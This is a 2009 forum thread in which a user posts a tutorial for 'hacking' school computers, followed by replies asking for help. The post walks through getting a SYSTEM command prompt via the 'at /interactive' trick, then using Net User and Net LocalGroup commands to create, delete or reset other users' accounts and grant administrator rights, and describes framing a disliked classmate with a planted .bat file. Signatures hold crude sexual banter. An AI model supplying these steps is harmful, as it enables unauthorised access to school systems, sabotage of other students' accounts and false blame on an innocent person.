User Tag List

Page 1 of 5 123 ... LastLast

Thread: How to "hack" a school revisited by Zeus

How to "hack" a school revisited by Zeus

User Info Menu

How to "hack" a school revisited by Zeus

* This is revisited because a lot of things don't work anymore described in colesndmesh's thread in "Hacking Free Chat" without having special access and besides his was copy and paste I wrote this all. *

Well, a lot of the things people try now just don't work anymore because the schools block a lot of things if your not an administrator. Ill teach you how to do pretty much anything on the internet, but some things just can't be bypassed.

First, get this straight. You don't need a PROXY Online Web Server to get to the website you want, most schools block a lot of the proxies. How do you get past this? Go to google. What do I mean? This simply put the website you want to go to into the translation url to translate. Then translate English to English. Your going to the site through googles IP, so it acts like a proxy but your school will never block google.

Also another simple way, go into command prompt ( \/ read how ) type
    Code:
     ping <website you want to go to>
    It should give you a bunch of info about the site, most importantly. Its IP Address Now simply click the black box in the top left corner of the command prompt window click Edit > Mark and select the IP Address then click the box again click Edit > Copy. Go to your Web Browser and input that ip address like this
    Code:
    http://209.85.171.100/
    That would bring you do Google. UNBLOCKED. ( Although google isn't blocked )

This was just how to get on the internet without being blocked.

Now how to fuck with people...

You can try and send messages to people with "Command Prompt" but it probably won't work because schools are getting smarter and blocking things. So how do we do it?

Get SYSTEM access. Don't know what System access is? System is your SYSTEM, you can control ANYTHING! Its higher than an administrator. How do we do this?

Go to Start > Run > CMD
    If your school blocks CMD then go to any webpage and click View > Source then erase everything in the notepad type COMMAND.COM then save the file as a .bat and run it.

Type this in command prompt
    Code:
    at 5:52 /interactive "cmd.exe"
    exactly like that ( Change the 5:32 to about 2 minutes after the time it is right now on your computer )

What this does is open a command prompt with system access.

Once the 2 minutes is up cmd.exe should open up. Now press CTRL + ALT + DELETE go to Explorer.exe under processes and press DELETE on it. It will close the process and your desktop will dissapear. Now open the old command prompt you typed that message into and close it. Leaving the command prompt with system access open. Now type
    Code:
    explorer.exe
    In command prompt and it will open Everything up as SYSTEM. Now YOU are SYSTEM.

Now to fuck with people. Heres what we will be using..

Code:
    CD
    What this does is "Change Directory" changes to the directory you want or folder. An example would be "CD C:\Windows\System32" That would bring us to the System32 folder

Code:
    Net User <username> <password> /add
    This adds a username with what ever password you input.

Code:
    Net User <username> /delete
    This deletes the username you specify

Code:
    Net User <username> *
    Lets you edit the password of the username specified ( The text when typed does NOT show up it stays blank. )

Code:
    Net LocalGroup
    This lists all the groups on the computer. Example..
    "
    *Administrators
    *Guests
    *Users
    "

Code:
    Net LocalGroup <administrators> <username> /ADD
    This adds the username you specify to the group specified. ( Administrators by default is administrators but isn't always. So you need Net LocalGroup to list them incase it isn't administrators. )

Code:
    Net Send <domain> * "Its -.Z3U5.-!"
    This sends a message on the domain specified. The * is basically says " I want to send to everyone. "

Code:
    Net Send <domain> <username>,<username2>,<username3> "Its -.Z3U5.-"
    This sends a message on the doman specified to the users you want, make sure no spaces are inbetween the usernames.

Before you do ANYTHING further than getting system access you probably want to create a new account so they can't track everything you do back to you. To do this use this code..
    Code:
    Net User <username> <password> /add
    Put the username you want in <username> and the password you want in <password> /add tells the computer you want to add the username.

If you would like to be an ass hole you could all do this..

Code:
    Net User <username> /delete
    This will delete the username specified if you don't like the person or if your getting rid of your spare account you use for messing with the school. Alternatively to just give a friend a hard time you could use this..

Code:
    Net User <username> *
    Just put the username you would like and make sure a space is between the username and astericks. ( * )

Now this
    Code:
    Net LocalGroup
    could be the most important part of this tutorial due to things being blocked on a normal account. All though this isn't needed now because you have system access you could do some devious things with this..

Code:
    Net LocalGroup <administrators> <username> /add
    To use this use Net Localgroup first to find all the groups then swap <administrators> out with the admin group then the username out with your normal account or someone you hate. ( Ill talk more on how to fuck someone over in a little. )

Code:
    Net Send <domain> * "Its -.Z3U5.-!"
    This is very simple.. tell your school who they have been "hacked" by. First you need the domain name generally you can find it when logging in, it will tell you what domain your using. You need to swap that out with <domain> it could be SaltlakeSchools or ManhattenDs1. Then * declares a message to everyone on this domain then the message goes between the quotes. ( You need quotes when doing this. )

Code:
    Net Send <domain> <username>,<username2>,<username3> "Its -.Z3U5.-"
    This is basically the same thing as aboe it just denotes to send to the users specified if you want to send a message to just your friends in the same room.

Now as I was saying you can really fuck someone over knowing all this.

How do you do this?

Take the person you hates account and first log onto it ( Net User <username> * to change their password ). Go to their local files that should be on an online thing spread all over the network so they can use them anywhere. Sometimes the drive can be H:\ or G:\ it should say something like this as the drive "<username>83 DomanOrDistrictName" something along those lines.

Make a new text file and in this file type this..
    Net Send <domain> * "You have been hacked ( persons name and last name )"
    Net LocalGroup <administrators> <username> /add
    Then save the file as HAH.bat in their files.

Now change their password to something like "balls" using what I've taught you then run that .bat file ( MAKE SURE THIS PERSON DOES NOT HAVE AN ALIBI ) log out and log onto your account quickly.

Now the school with think they did this and then they will find that .bat file and they will find they are an administrator. Hmm don't you think its odd for a student at that school to have administrator access and have a different password than said to have?

Well i hope you guys learned something also read the following.

I TAKE NO RESPONSIBILITY FOR WHAT YOU DO WITH WHAT I HAVE TAUGHT YOU. THIS IS MADE FOR EDUCATIONAL USE ONLY.

I also just so you know DESPISE the hacking of schools. They are here to teach you, your usage of their technology is a privilege not a right.

Thank you for reading.
    Last edited by Zeus; 04-29-2009 at 03:20 PM.
    Every man for himself. You trust no one but yourself, if you want something done you do it your self don't rely on others. You watch your own back, you fight your own fights its you against the world.

Quote Originally Posted by Some phag
    -.BUS.-'s mommy says to Cannon, "I love you,
    I love you, I love you"
    The Cannon on the bus says, "I love you, too"
    All through the town.

User Info Menu

Re: How to "hack" a school revisited by -.Z3U5.-

great tut. but most EVERYTHING is blocked at my school. even google translator is blocked. ive tried it :/ all the proxies are blocked too.

Light up the Darkness - Bob Marley

How to &quot;hack&quot; a school revisited by Zeus

User Info Menu

Quote Originally Posted by 7h3.4v3nGeD.0n3 View Post
    great tut. but most EVERYTHING is blocked at my school. even google translator is blocked. ive tried it :/ all the proxies are blocked too.
    lol me too
    .:: DO YOUR PART - Remember to press the Report Button for posts that need moderation. ::.
    .::Forum Rules | List of Demands Part II ::.

Rep :<Current>(230) + <Previous>(207)= <Total>(437)
    AdamAndersen aka Pink Floyd
    [12-03, 18:47] taking it in the ass IS...
    [12-03, 18:47] giving sex to another man isn't exactly gay...
    [12-03, 18:45] ill suck your dick if you suck mine. dealio?

Adam Andersen: I give him a hug every night after we make love.

Rigalic Reign: I too had a sexual encounter with a female in kindergarten
    CoDeX: Don't talk about last week.

[Today 03:56 PM] Sneaky Poptart: They haven't dropped yet?
    [Today 03:24 PM] BioHazardouz: My nuts
    [Today 01:42 PM] RageRaft: Whats up guys.

When in doubt. Get the f*ck out!

CoDeX is like buttsecks. Some people like him. Most think he is a pain in the ass.

User Info Menu

Code:
    ping <websitename.com>
    go to the sites IP address for Google it would be http://209.85.171.100 Doesn't work for Console Discussions though because its blank there, I think johnny can do it though.
    Last edited by Zeus; 01-31-2009 at 08:59 PM.
    Every man for himself. You trust no one but yourself, if you want something done you do it your self don't rely on others. You watch your own back, you fight your own fights its you against the world.

I love you, I love you"
    All through the town.

User Info Menu

i cant get into the cmd on my school comps...like i can put i cant type anything would a flashdrive work?
    .:New Favorite:.

.: Forum Rules | Announcements | My GFx | My Myspace | My Profile :.

User Info Menu

Quote Originally Posted by X150riderx View Post
    i cant get into the cmd on my school comps...like i can put i cant type anything would a flashdrive work?
    Open internet explorer go to any website like google click view > source then it will open notepad, erase everything in it type "command.com" and save it as something.bat somewhere you can use it. That will open CMD.

I love you, I love you"
    All through the town.

User Info Menu

like i can get into it but i cant type can i type in that?
    .:New Favorite:.

.: Forum Rules | Announcements | My GFx | My Myspace | My Profile :.

User Info Menu

What do you mean you cant type in it?

I love you, I love you"
    All through the town.

User Info Menu

you have no idea how many things ive tried. if they would simply allow us to use our flash drives, i could do anything i wanted.

Light up the Darkness - Bob Marley

User Info Menu

you have no idea how many things ive tried. if they would simply allow us to use our flash drives, i could do anything i wanted.
    Then use your flash drive if it has a thing on the front, or make a shortcut to CMD or a .bat file with command.com in it on a floppy disk slide it in quietly in school run it then take it out you'll have command prompt open.

I love you, I love you"
    All through the town.

Page 1 of 5 123 ... LastLast